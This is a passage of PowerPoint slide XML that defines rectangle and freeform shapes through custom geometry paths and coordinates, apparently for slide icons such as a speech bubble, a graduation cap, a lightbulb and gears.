                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B57EE74-0CE4-434B-BC4F-DB2CEDE43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40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48" name="Rectangle 247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47C1471-EA75-4A42-A33E-E1C2DFD1D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38"/>
                <a:ext cx="7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49" name="Rectangle 248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD54008-82AA-4043-BA42-CF09DF51C1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37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50" name="Rectangle 249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C0D8585-083E-4ED2-A1F5-2363823B6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35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51" name="Rectangle 250">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F048DC50-E3D0-4CE5-B04C-FA508BF23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32"/>
                <a:ext cx="6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52" name="Rectangle 251">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CD2012-78E8-47F2-8DDB-4A9EFEE99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31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8E5139A8-FE24-4E20-B92C-DBA1FEFEC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29"/>
                <a:ext cx="1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54" name="Rectangle 253">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49F9F56-871F-4AC4-B9C9-CBB62FA81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27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CD32B833-20E5-46F6-8E12-23DA202CE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25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56" name="Rectangle 255">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EC115D-7AFB-403E-9977-0E6978351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23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57" name="Rectangle 256">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7538975-2349-4ECF-AB1E-B29C2B2FC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22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58" name="Rectangle 257">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7588CBBA-A622-484C-8988-15E8B515B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20"/>
                <a:ext cx="7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59" name="Rectangle 258">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7897FE4F-641A-4FBE-B2FD-EA063C4B9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18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60" name="Rectangle 259">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A73B9A-19AC-4BD0-9ADD-A359E7B7A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17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61" name="Rectangle 260">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{199E2348-5FCB-4149-B362-039468F2D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14"/>
                <a:ext cx="6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62" name="Rectangle 261">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C796B2DB-8959-4679-95C0-4E07A3730B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512"/>
                <a:ext cx="6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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Freeform 1554">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5480992B-5223-423F-AFAE-2A983EA96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973" y="2546349"/>
              <a:ext cx="554038" cy="398462"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 492126 w 554038"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 398462"/>
                <a:gd name="connsiteX1" fmla="*/ 554038 w 554038"/>
                <a:gd name="connsiteY1" fmla="*/ 349250 h 398462"/>
                <a:gd name="connsiteX2" fmla="*/ 301626 w 554038"/>
                <a:gd name="connsiteY2" fmla="*/ 395287 h 398462"/>
                <a:gd name="connsiteX3" fmla="*/ 301590 w 554038"/>
                <a:gd name="connsiteY3" fmla="*/ 395086 h 398462"/>
                <a:gd name="connsiteX4" fmla="*/ 285130 w 554038"/>
                <a:gd name="connsiteY4" fmla="*/ 385016 h 398462"/>
                <a:gd name="connsiteX5" fmla="*/ 60325 w 554038"/>
                <a:gd name="connsiteY5" fmla="*/ 398462 h 398462"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 554038"/>
                <a:gd name="connsiteY6" fmla="*/ 61289 h 398462"/>
                <a:gd name="connsiteX7" fmla="*/ 239624 w 554038"/>
                <a:gd name="connsiteY7" fmla="*/ 42837 h 398462"/>
                <a:gd name="connsiteX8" fmla="*/ 284898 w 554038"/>
                <a:gd name="connsiteY8" fmla="*/ 300069 h 398462"/>
                <a:gd name="connsiteX9" fmla="*/ 239713 w 554038"/>
                <a:gd name="connsiteY9" fmla="*/ 42863 h 398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4038" h="398462">
                  <a:moveTo>
                    <a:pt x="492126" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="554038" y="349250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301626" y="395287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301590" y="395086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285130" y="385016"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="252611" y="368267"/>
                    <a:pt x="173434" y="341847"/>
                    <a:pt x="60325" y="398462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61289"/>
                    <a:pt x="0" y="61289"/>
                    <a:pt x="0" y="61289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61289"/>
                    <a:pt x="102217" y="-15875"/>
                    <a:pt x="239624" y="42837"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="284898" y="300069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239713" y="428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51" name="Freeform 1528">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01D5DAB-1E57-443E-9626-2A5CD0F8B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475" y="2189163"/>
              <a:ext cx="1184275" cy="1235075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 706"/>
                <a:gd name="T1" fmla="*/ 337 h 737"/>
                <a:gd name="T2" fmla="*/ 343 w 706"/>
                <a:gd name="T3" fmla="*/ 5 h 737"/>
                <a:gd name="T4" fmla="*/ 701 w 706"/>
                <a:gd name="T5" fmla="*/ 315 h 737"/>
                <a:gd name="T6" fmla="*/ 453 w 706"/>
                <a:gd name="T7" fmla="*/ 633 h 737"/>
                <a:gd name="T8" fmla="*/ 491 w 706"/>
                <a:gd name="T9" fmla="*/ 737 h 737"/>
                <a:gd name="T10" fmla="*/ 219 w 706"/>
                <a:gd name="T11" fmla="*/ 623 h 737"/>
                <a:gd name="T12" fmla="*/ 219 w 706"/>
                <a:gd name="T13" fmla="*/ 622 h 737"/>
                <a:gd name="T14" fmla="*/ 5 w 706"/>
                <a:gd name="T15" fmla="*/ 337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6" h="737">
                  <a:moveTo>
                    <a:pt x="5" y="337"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="160"/>
                    <a:pt x="151" y="11"/>
                    <a:pt x="343" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="0"/>
                    <a:pt x="696" y="138"/>
                    <a:pt x="701" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="464"/>
                    <a:pt x="600" y="592"/>
                    <a:pt x="453" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="697"/>
                    <a:pt x="491" y="737"/>
                    <a:pt x="491" y="737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="721"/>
                    <a:pt x="219" y="623"/>
                    <a:pt x="219" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="622"/>
                    <a:pt x="219" y="622"/>
                    <a:pt x="219" y="622"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="576"/>
                    <a:pt x="9" y="467"/>
                    <a:pt x="5" y="33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52" name="Freeform 1555">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097B174E-6CDD-4DF4-B134-E0FFC67D5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512" y="2360613"/>
              <a:ext cx="787400" cy="682625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 146050 w 787400"/>
                <a:gd name="connsiteY0" fmla="*/ 320675 h 682625"/>
                <a:gd name="connsiteX1" fmla="*/ 392112 w 787400"/>
                <a:gd name="connsiteY1" fmla="*/ 457200 h 682625"/>
                <a:gd name="connsiteX2" fmla="*/ 639762 w 787400"/>
                <a:gd name="connsiteY2" fmla="*/ 320675 h 682625"/>
                <a:gd name="connsiteX3" fmla="*/ 639762 w 787400"/>
                <a:gd name="connsiteY3" fmla="*/ 682625 h 682625"/>
                <a:gd name="connsiteX4" fmla="*/ 146050 w 787400"/>
                <a:gd name="connsiteY4" fmla="*/ 682625 h 682625"/>
                <a:gd name="connsiteX5" fmla="*/ 392113 w 787400"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 682625"/>
                <a:gd name="connsiteX6" fmla="*/ 787400 w 787400"/>
                <a:gd name="connsiteY6" fmla="*/ 215900 h 682625"/>
                <a:gd name="connsiteX7" fmla="*/ 727074 w 787400"/>
                <a:gd name="connsiteY7" fmla="*/ 248849 h 682625"/>
                <a:gd name="connsiteX8" fmla="*/ 727074 w 787400"/>
                <a:gd name="connsiteY8" fmla="*/ 460375 h 682625"/>
                <a:gd name="connsiteX9" fmla="*/ 739775 w 787400"/>
                <a:gd name="connsiteY9" fmla="*/ 460375 h 682625"/>
                <a:gd name="connsiteX10" fmla="*/ 739775 w 787400"/>
                <a:gd name="connsiteY10" fmla="*/ 676275 h 682625"/>
                <a:gd name="connsiteX11" fmla="*/ 679450 w 787400"/>
                <a:gd name="connsiteY11" fmla="*/ 676275 h 682625"/>
                <a:gd name="connsiteX12" fmla="*/ 679450 w 787400"/>
                <a:gd name="connsiteY12" fmla="*/ 460375 h 682625"/>
                <a:gd name="connsiteX13" fmla="*/ 696912 w 787400"/>
                <a:gd name="connsiteY13" fmla="*/ 460375 h 682625"/>
                <a:gd name="connsiteX14" fmla="*/ 696912 w 787400"/>
                <a:gd name="connsiteY14" fmla="*/ 265323 h 682625"/>
                <a:gd name="connsiteX15" fmla="*/ 392113 w 787400"/>
                <a:gd name="connsiteY15" fmla="*/ 431800 h 682625"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 787400"/>
                <a:gd name="connsiteY16" fmla="*/ 215900 h 68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7400" h="682625">
                  <a:moveTo>
                    <a:pt x="146050" y="320675"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="392112" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639762" y="320675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639762" y="682625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146050" y="682625"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="392113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="787400" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727074" y="248849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727074" y="460375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739775" y="460375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739775" y="676275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679450" y="676275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679450" y="460375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696912" y="460375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696912" y="265323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392113" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2159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54" name="Freeform 1552">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B191A24F-54C1-4F1C-85DF-94A5601B6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186" y="3390900"/>
              <a:ext cx="222250" cy="292100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 86121 w 222250"/>
                <a:gd name="connsiteY0" fmla="*/ 266700 h 292100"/>
                <a:gd name="connsiteX1" fmla="*/ 136128 w 222250"/>
                <a:gd name="connsiteY1" fmla="*/ 266700 h 292100"/>
                <a:gd name="connsiteX2" fmla="*/ 144462 w 222250"/>
                <a:gd name="connsiteY2" fmla="*/ 273844 h 292100"/>
                <a:gd name="connsiteX3" fmla="*/ 136128 w 222250"/>
                <a:gd name="connsiteY3" fmla="*/ 280987 h 292100"/>
                <a:gd name="connsiteX4" fmla="*/ 123510 w 222250"/>
                <a:gd name="connsiteY4" fmla="*/ 280987 h 292100"/>
                <a:gd name="connsiteX5" fmla="*/ 120451 w 222250"/>
                <a:gd name="connsiteY5" fmla="*/ 288698 h 292100"/>
                <a:gd name="connsiteX6" fmla="*/ 112017 w 222250"/>
                <a:gd name="connsiteY6" fmla="*/ 292100 h 292100"/>
                <a:gd name="connsiteX7" fmla="*/ 108644 w 222250"/>
                <a:gd name="connsiteY7" fmla="*/ 292100 h 292100"/>
                <a:gd name="connsiteX8" fmla="*/ 100210 w 222250"/>
                <a:gd name="connsiteY8" fmla="*/ 288698 h 292100"/>
                <a:gd name="connsiteX9" fmla="*/ 97152 w 222250"/>
                <a:gd name="connsiteY9" fmla="*/ 280987 h 292100"/>
                <a:gd name="connsiteX10" fmla="*/ 92372 w 222250"/>
                <a:gd name="connsiteY10" fmla="*/ 280987 h 292100"/>
                <a:gd name="connsiteX11" fmla="*/ 86121 w 222250"/>
                <a:gd name="connsiteY11" fmla="*/ 280987 h 292100"/>
                <a:gd name="connsiteX12" fmla="*/ 77787 w 222250"/>
                <a:gd name="connsiteY12" fmla="*/ 273844 h 292100"/>
                <a:gd name="connsiteX13" fmla="*/ 86121 w 222250"/>
                <a:gd name="connsiteY13" fmla="*/ 266700 h 292100"/>
                <a:gd name="connsiteX14" fmla="*/ 111125 w 222250"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 292100"/>
                <a:gd name="connsiteX15" fmla="*/ 222250 w 222250"/>
                <a:gd name="connsiteY15" fmla="*/ 110331 h 292100"/>
                <a:gd name="connsiteX16" fmla="*/ 203272 w 222250"/>
                <a:gd name="connsiteY16" fmla="*/ 172018 h 292100"/>
                <a:gd name="connsiteX17" fmla="*/ 188293 w 222250"/>
                <a:gd name="connsiteY17" fmla="*/ 184264 h 292100"/>
                <a:gd name="connsiteX18" fmla="*/ 188912 w 222250"/>
                <a:gd name="connsiteY18" fmla="*/ 184872 h 292100"/>
                <a:gd name="connsiteX19" fmla="*/ 156903 w 222250"/>
                <a:gd name="connsiteY19" fmla="*/ 225281 h 292100"/>
                <a:gd name="connsiteX20" fmla="*/ 136959 w 222250"/>
                <a:gd name="connsiteY20" fmla="*/ 244475 h 292100"/>
                <a:gd name="connsiteX21" fmla="*/ 138457 w 222250"/>
                <a:gd name="connsiteY21" fmla="*/ 244475 h 292100"/>
                <a:gd name="connsiteX22" fmla="*/ 139339 w 222250"/>
                <a:gd name="connsiteY22" fmla="*/ 244475 h 292100"/>
                <a:gd name="connsiteX23" fmla="*/ 147637 w 222250"/>
                <a:gd name="connsiteY23" fmla="*/ 254866 h 292100"/>
                <a:gd name="connsiteX24" fmla="*/ 139339 w 222250"/>
                <a:gd name="connsiteY24" fmla="*/ 263525 h 292100"/>
                <a:gd name="connsiteX25" fmla="*/ 82910 w 222250"/>
                <a:gd name="connsiteY25" fmla="*/ 263525 h 292100"/>
                <a:gd name="connsiteX26" fmla="*/ 74612 w 222250"/>
                <a:gd name="connsiteY26" fmla="*/ 254866 h 292100"/>
                <a:gd name="connsiteX27" fmla="*/ 82910 w 222250"/>
                <a:gd name="connsiteY27" fmla="*/ 244475 h 292100"/>
                <a:gd name="connsiteX28" fmla="*/ 85290 w 222250"/>
                <a:gd name="connsiteY28" fmla="*/ 244475 h 292100"/>
                <a:gd name="connsiteX29" fmla="*/ 65346 w 222250"/>
                <a:gd name="connsiteY29" fmla="*/ 225281 h 292100"/>
                <a:gd name="connsiteX30" fmla="*/ 45237 w 222250"/>
                <a:gd name="connsiteY30" fmla="*/ 196841 h 292100"/>
                <a:gd name="connsiteX31" fmla="*/ 32548 w 222250"/>
                <a:gd name="connsiteY31" fmla="*/ 188347 h 292100"/>
                <a:gd name="connsiteX32" fmla="*/ 0 w 222250"/>
                <a:gd name="connsiteY32" fmla="*/ 110331 h 292100"/>
                <a:gd name="connsiteX33" fmla="*/ 111125 w 222250"/>
                <a:gd name="connsiteY33" fmla="*/ 0 h 29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22250" h="292100">
                  <a:moveTo>
                    <a:pt x="86121" y="266700"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136128" y="266700"/>
                    <a:pt x="136128" y="266700"/>
                    <a:pt x="136128" y="266700"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141128" y="266700"/>
                    <a:pt x="144462" y="270272"/>
                    <a:pt x="144462" y="273844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144462" y="277415"/>
                    <a:pt x="141128" y="280987"/>
                    <a:pt x="136128" y="280987"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123510" y="280987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120451" y="288698"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="118342" y="290825"/>
                    <a:pt x="115391" y="292100"/>
                    <a:pt x="112017" y="292100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108644" y="292100"/>
                    <a:pt x="108644" y="292100"/>
                    <a:pt x="108644" y="292100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105271" y="292100"/>
                    <a:pt x="102319" y="290825"/>
                    <a:pt x="100210" y="288698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97152" y="280987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92372" y="280987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86121" y="280987"/>
                    <a:pt x="86121" y="280987"/>
                    <a:pt x="86121" y="280987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81121" y="280987"/>
                    <a:pt x="77787" y="277415"/>
                    <a:pt x="77787" y="273844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77787" y="270272"/>
                    <a:pt x="81121" y="266700"/>
                    <a:pt x="86121" y="266700"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="111125" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="172498" y="0"/>
                    <a:pt x="222250" y="49397"/>
                    <a:pt x="222250" y="110331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222250" y="133181"/>
                    <a:pt x="215254" y="154409"/>
                    <a:pt x="203272" y="172018"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="188293" y="184264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188912" y="184872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188912" y="184872"/>
                    <a:pt x="173750" y="194974"/>
                    <a:pt x="156903" y="225281"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136959" y="244475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138457" y="244475"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139339" y="244475"/>
                    <a:pt x="139339" y="244475"/>
                    <a:pt x="139339" y="244475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144318" y="244475"/>
                    <a:pt x="147637" y="247939"/>
                    <a:pt x="147637" y="254866"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147637" y="260061"/>
                    <a:pt x="144318" y="263525"/>
                    <a:pt x="139339" y="263525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82910" y="263525"/>
                    <a:pt x="82910" y="263525"/>
                    <a:pt x="82910" y="263525"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77931" y="263525"/>
                    <a:pt x="74612" y="260061"/>
                    <a:pt x="74612" y="254866"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74612" y="247939"/>
                    <a:pt x="77931" y="244475"/>
                    <a:pt x="82910" y="244475"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85290" y="244475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65346" y="225281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45237" y="196841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32548" y="188347"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12438" y="168381"/>
                    <a:pt x="0" y="140798"/>
                    <a:pt x="0" y="110331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49397"/>
                    <a:pt x="49752" y="0"/>
                    <a:pt x="111125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263" name="Freeform 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7D026A-9D5A-4A03-9004-5097A235354F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8308663" y="1278820"/>
            <a:ext cx="471357" cy="421059"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 154781 w 78"/>
              <a:gd name="T1" fmla="*/ 141176 h 71"/>
              <a:gd name="T2" fmla="*/ 161660 w 78"/>
              <a:gd name="T3" fmla="*/ 172165 h 71"/>
              <a:gd name="T4" fmla="*/ 137583 w 78"/>
              <a:gd name="T5" fmla="*/ 192825 h 71"/>
              <a:gd name="T6" fmla="*/ 106627 w 78"/>
              <a:gd name="T7" fmla="*/ 206599 h 71"/>
              <a:gd name="T8" fmla="*/ 72231 w 78"/>
              <a:gd name="T9" fmla="*/ 206599 h 71"/>
              <a:gd name="T10" fmla="*/ 44715 w 78"/>
              <a:gd name="T11" fmla="*/ 192825 h 71"/>
              <a:gd name="T12" fmla="*/ 17198 w 78"/>
              <a:gd name="T13" fmla="*/ 172165 h 71"/>
              <a:gd name="T14" fmla="*/ 27517 w 78"/>
              <a:gd name="T15" fmla="*/ 141176 h 71"/>
              <a:gd name="T16" fmla="*/ 0 w 78"/>
              <a:gd name="T17" fmla="*/ 110186 h 71"/>
              <a:gd name="T18" fmla="*/ 30956 w 78"/>
              <a:gd name="T19" fmla="*/ 89526 h 71"/>
              <a:gd name="T20" fmla="*/ 17198 w 78"/>
              <a:gd name="T21" fmla="*/ 68866 h 71"/>
              <a:gd name="T22" fmla="*/ 58473 w 78"/>
              <a:gd name="T23" fmla="*/ 61980 h 71"/>
              <a:gd name="T24" fmla="*/ 75671 w 78"/>
              <a:gd name="T25" fmla="*/ 34433 h 71"/>
              <a:gd name="T26" fmla="*/ 110066 w 78"/>
              <a:gd name="T27" fmla="*/ 58536 h 71"/>
              <a:gd name="T28" fmla="*/ 141023 w 78"/>
              <a:gd name="T29" fmla="*/ 48206 h 71"/>
              <a:gd name="T30" fmla="*/ 161660 w 78"/>
              <a:gd name="T31" fmla="*/ 75753 h 71"/>
              <a:gd name="T32" fmla="*/ 175418 w 78"/>
              <a:gd name="T33" fmla="*/ 103299 h 71"/>
              <a:gd name="T34" fmla="*/ 89429 w 78"/>
              <a:gd name="T35" fmla="*/ 86083 h 71"/>
              <a:gd name="T36" fmla="*/ 123825 w 78"/>
              <a:gd name="T37" fmla="*/ 120516 h 71"/>
              <a:gd name="T38" fmla="*/ 247650 w 78"/>
              <a:gd name="T39" fmla="*/ 65423 h 71"/>
              <a:gd name="T40" fmla="*/ 247650 w 78"/>
              <a:gd name="T41" fmla="*/ 92969 h 71"/>
              <a:gd name="T42" fmla="*/ 213254 w 78"/>
              <a:gd name="T43" fmla="*/ 86083 h 71"/>
              <a:gd name="T44" fmla="*/ 178858 w 78"/>
              <a:gd name="T45" fmla="*/ 92969 h 71"/>
              <a:gd name="T46" fmla="*/ 182298 w 78"/>
              <a:gd name="T47" fmla="*/ 65423 h 71"/>
              <a:gd name="T48" fmla="*/ 182298 w 78"/>
              <a:gd name="T49" fmla="*/ 37876 h 71"/>
              <a:gd name="T50" fmla="*/ 178858 w 78"/>
              <a:gd name="T51" fmla="*/ 10330 h 71"/>
              <a:gd name="T52" fmla="*/ 213254 w 78"/>
              <a:gd name="T53" fmla="*/ 13773 h 71"/>
              <a:gd name="T54" fmla="*/ 230452 w 78"/>
              <a:gd name="T55" fmla="*/ 0 h 71"/>
              <a:gd name="T56" fmla="*/ 240770 w 78"/>
              <a:gd name="T57" fmla="*/ 30990 h 71"/>
              <a:gd name="T58" fmla="*/ 268287 w 78"/>
              <a:gd name="T59" fmla="*/ 61980 h 71"/>
              <a:gd name="T60" fmla="*/ 240770 w 78"/>
              <a:gd name="T61" fmla="*/ 213485 h 71"/>
              <a:gd name="T62" fmla="*/ 230452 w 78"/>
              <a:gd name="T63" fmla="*/ 244475 h 71"/>
              <a:gd name="T64" fmla="*/ 209814 w 78"/>
              <a:gd name="T65" fmla="*/ 227258 h 71"/>
              <a:gd name="T66" fmla="*/ 178858 w 78"/>
              <a:gd name="T67" fmla="*/ 234145 h 71"/>
              <a:gd name="T68" fmla="*/ 161660 w 78"/>
              <a:gd name="T69" fmla="*/ 203155 h 71"/>
              <a:gd name="T70" fmla="*/ 185737 w 78"/>
              <a:gd name="T71" fmla="*/ 172165 h 71"/>
              <a:gd name="T72" fmla="*/ 196056 w 78"/>
              <a:gd name="T73" fmla="*/ 141176 h 71"/>
              <a:gd name="T74" fmla="*/ 216693 w 78"/>
              <a:gd name="T75" fmla="*/ 158392 h 71"/>
              <a:gd name="T76" fmla="*/ 247650 w 78"/>
              <a:gd name="T77" fmla="*/ 151506 h 71"/>
              <a:gd name="T78" fmla="*/ 247650 w 78"/>
              <a:gd name="T79" fmla="*/ 179052 h 71"/>
              <a:gd name="T80" fmla="*/ 213254 w 78"/>
              <a:gd name="T81" fmla="*/ 34433 h 71"/>
              <a:gd name="T82" fmla="*/ 230452 w 78"/>
              <a:gd name="T83" fmla="*/ 51650 h 71"/>
              <a:gd name="T84" fmla="*/ 196056 w 78"/>
              <a:gd name="T85" fmla="*/ 192825 h 71"/>
              <a:gd name="T86" fmla="*/ 213254 w 78"/>
              <a:gd name="T87" fmla="*/ 175609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78" h="71">
                <a:moveTo>
                  <a:pt x="52" y="39"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="40"/>
                  <a:pt x="51" y="40"/>
                  <a:pt x="51" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="41"/>
                  <a:pt x="45" y="41"/>
                  <a:pt x="45" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="42"/>
                  <a:pt x="44" y="43"/>
                  <a:pt x="43" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="46"/>
                  <a:pt x="46" y="47"/>
                  <a:pt x="47" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="49"/>
                  <a:pt x="47" y="49"/>
                  <a:pt x="47" y="50"/>
